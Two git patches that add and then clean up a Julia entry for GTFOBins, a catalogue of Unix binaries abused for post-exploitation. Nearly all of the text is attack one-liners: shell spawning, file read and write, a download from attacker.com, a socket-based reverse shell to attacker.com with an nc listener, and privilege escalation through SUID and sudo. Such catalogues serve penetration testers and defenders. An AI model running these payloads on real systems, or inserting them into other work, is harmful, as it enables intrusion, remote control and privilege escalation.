From 7a4a16409a38a526131ea611072ce30a2e967775 Mon Sep 17 00:00:00 2001 From: Davidson Mizael Date: Mon, 17 Apr 2023 23:46:57 -0300 Subject: [PATCH 1/2] Create julia.md --- _gtfobins/julia.md | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 _gtfobins/julia.md diff --git a/_gtfobins/julia.md b/_gtfobins/julia.md new file mode 100644 index 0000000..f7240e8 --- /dev/null +++ b/_gtfobins/julia.md @@ -0,0 +1,25 @@ +--- +description: | +All payloads are compatible with the Base packages from Julia. +functions: + shell: + - description: The `run()` function runs every command passed as parameter with what is defined in `$JULIA_SHELL`. Defaults to the environment variable `$SHELL`, and falls back to `/bin/sh` if `$SHELL` is unset. + - code: julia -e 'while true; c = split(readline()); run(`$c`); end;' + file-read: + - code: julia -e 'println(open(f->read(f, String), "file_to_read"))' + file-write: + - code: julia -e 'open(f->write(f, "DATA"), "file_to_write", "w")' + file-download: + - code: julia -e 'download("URL", "PATH")' + reverse-shell: + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + julia -e 'using Sockets; sock=connect(ENV["RHOST"], parse(Int64,ENV["RPORT"])); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;' + suid: + - code: julia -e 'while true; c = split(readline()); run(`$c`); end;' + sudo: + - description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. + - code: sudo julia -e 'while true; c = split(readline()); run(`$c`); end;' +--- From 43f2ea04284796b8f6cc04526f62075234873356 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Thu, 20 Apr 2023 08:51:20 +0200 Subject: [PATCH 2/2] Clean and fix julia --- _gtfobins/julia.md | 26 ++++++++++++++++---------- 1 file changed, 16 insertions(+), 10 deletions(-) diff --git a/_gtfobins/julia.md b/_gtfobins/julia.md index f7240e8..2ea7ec1 100644 --- a/_gtfobins/julia.md +++ b/_gtfobins/julia.md @@ -1,16 +1,21 @@ --- -description: | -All payloads are compatible with the Base packages from Julia. functions: shell: - - description: The `run()` function runs every command passed as parameter with what is defined in `$JULIA_SHELL`. Defaults to the environment variable `$SHELL`, and falls back to `/bin/sh` if `$SHELL` is unset. - - code: julia -e 'while true; c = split(readline()); run(`$c`); end;' + - code: | + julia -e 'run(`/bin/sh`)' file-read: - - code: julia -e 'println(open(f->read(f, String), "file_to_read"))' + - code: | + export LFILE=file_to_read + julia -e 'print(open(f->read(f, String), ENV["LFILE"]))' file-write: - - code: julia -e 'open(f->write(f, "DATA"), "file_to_write", "w")' + - code: | + export LFILE=file_to_write + julia -e 'open(f->write(f, "DATA"), ENV["LFILE"], "w")' file-download: - - code: julia -e 'download("URL", "PATH")' + - code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + julia -e 'download(ENV["URL"], ENV["LFILE"])' reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | @@ -18,8 +23,9 @@ functions: export RPORT=12345 julia -e 'using Sockets; sock=connect(ENV["RHOST"], parse(Int64,ENV["RPORT"])); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;' suid: - - code: julia -e 'while true; c = split(readline()); run(`$c`); end;' + - code: | + ./julia -e 'run(`/bin/sh -p`)' sudo: - - description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. - - code: sudo julia -e 'while true; c = split(readline()); run(`$c`); end;' + - code: | + sudo julia -e 'run(`/bin/sh`)' ---